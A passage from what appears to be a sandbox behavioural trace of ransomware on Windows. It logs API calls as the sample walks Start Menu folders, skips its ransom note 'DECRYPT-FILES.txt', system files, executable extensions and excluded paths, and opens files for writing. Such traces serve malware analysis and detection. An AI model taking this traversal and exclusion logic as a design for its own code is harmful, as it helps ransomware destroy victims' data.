ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.419] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.419] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.419] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac219a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.419] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.419] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0080.419] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.419] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0080.419] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0080.419] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0080.419] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="autorun.inf") returned 1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="boot.ini") returned 1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="desktop.ini") returned 1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat") returned -1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="iconcache.db") returned -1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="bootsect.bak") returned 1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat.log") returned -1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="thumbs.db") returned -1 [0080.419] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="Bootfont.bin") returned 1 [0080.419] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0080.419] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.419] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac219a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.419] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.420] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.420] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.420] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.420] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.420] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.420] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.420] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0080.420] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.420] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0080.420] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\jkbimi8.tmp" [0080.420] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.420] CloseHandle (hObject=0x0) returned 0 [0080.420] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.421] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="autorun.inf") returned 1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="boot.ini") returned 1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="desktop.ini") returned 1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat") returned -1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="iconcache.db") returned 1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="bootsect.bak") returned 1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat.log") returned -1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="thumbs.db") returned -1 [0080.421] lstrcmpiW (lpString1="Magnify.lnk", lpString2="Bootfont.bin") returned 1 [0080.421] lstrlenW (lpString="Magnify.lnk") returned 11 [0080.421] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.421] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="autorun.inf") returned 1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="boot.ini") returned 1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="desktop.ini") returned 1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat") returned -1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="iconcache.db") returned 1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="bootsect.bak") returned 1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat.log") returned -1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="thumbs.db") returned -1 [0080.421] lstrcmpiW (lpString1="Narrator.lnk", lpString2="Bootfont.bin") returned 1 [0080.421] lstrlenW (lpString="Narrator.lnk") returned 12 [0080.421] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.421] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1 [0080.421] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.421] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="autorun.inf") returned 1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="boot.ini") returned 1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="desktop.ini") returned 1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat") returned 1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="iconcache.db") returned 1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="bootsect.bak") returned 1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat.log") returned 1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="thumbs.db") returned -1 [0080.422] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="Bootfont.bin") returned 1 [0080.422] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0080.422] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.422] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 0 [0080.422] FindClose (in: hFindFile=0x5f8dd8 | out: hFindFile=0x5f8dd8) returned 1 [0080.422] CloseHandle (hObject=0x468) returned 1 [0080.422] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="autorun.inf") returned 1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="boot.ini") returned 1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="desktop.ini") returned -1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat") returned -1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="iconcache.db") returned -1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="bootsect.bak") returned 1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat.log") returned -1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="thumbs.db") returned -1 [0080.422] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="Bootfont.bin") returned 1 [0080.422] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0080.422] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.422] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.422] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.422] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0080.423] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.423] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0080.423] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0080.423] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0080.423] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.423] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.423] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.423] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.423] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.423] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.423] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.423] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0080.423] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.423] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0080.423] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\jkbimi8.tmp" [0080.423] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.424] CloseHandle (hObject=0x0) returned 0 [0080.424] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.424] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="autorun.inf") returned 1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="boot.ini") returned 1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="desktop.ini") returned 1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat") returned -1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="iconcache.db") returned 1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="bootsect.bak") returned 1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat.log") returned -1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="thumbs.db") returned -1 [0080.424] lstrcmpiW (lpString1="Notepad.lnk", lpString2="Bootfont.bin") returned 1 [0080.424] lstrlenW (lpString="Notepad.lnk") returned 11 [0080.424] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.424] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="autorun.inf") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="boot.ini") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="desktop.ini") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="iconcache.db") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="bootsect.bak") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat.log") returned 1 [0080.424] lstrcmpiW (lpString1="Run.lnk", lpString2="thumbs.db") returned -1 [0080.425] lstrcmpiW (lpString1="Run.lnk", lpString2="Bootfont.bin") returned 1 [0080.425] lstrlenW (lpString="Run.lnk") returned 7 [0080.425] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.425] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0080.425] lstrcmpW (lpString1="System Tools", lpString2=".") returned 1 [0080.425] lstrcmpW (lpString1="System Tools", lpString2="..") returned 1 [0080.425] lstrcatW (in: lpString1="System Tools", lpString2="\\" | out: lpString1="System Tools\\") returned="System Tools\\" [0080.425] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="System Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0080.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Program Files") returned 0x0 [0080.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch=":\\Windows") returned 0x0 [0080.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Games\\") returned 0x0 [0080.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.425] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\All Users") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start 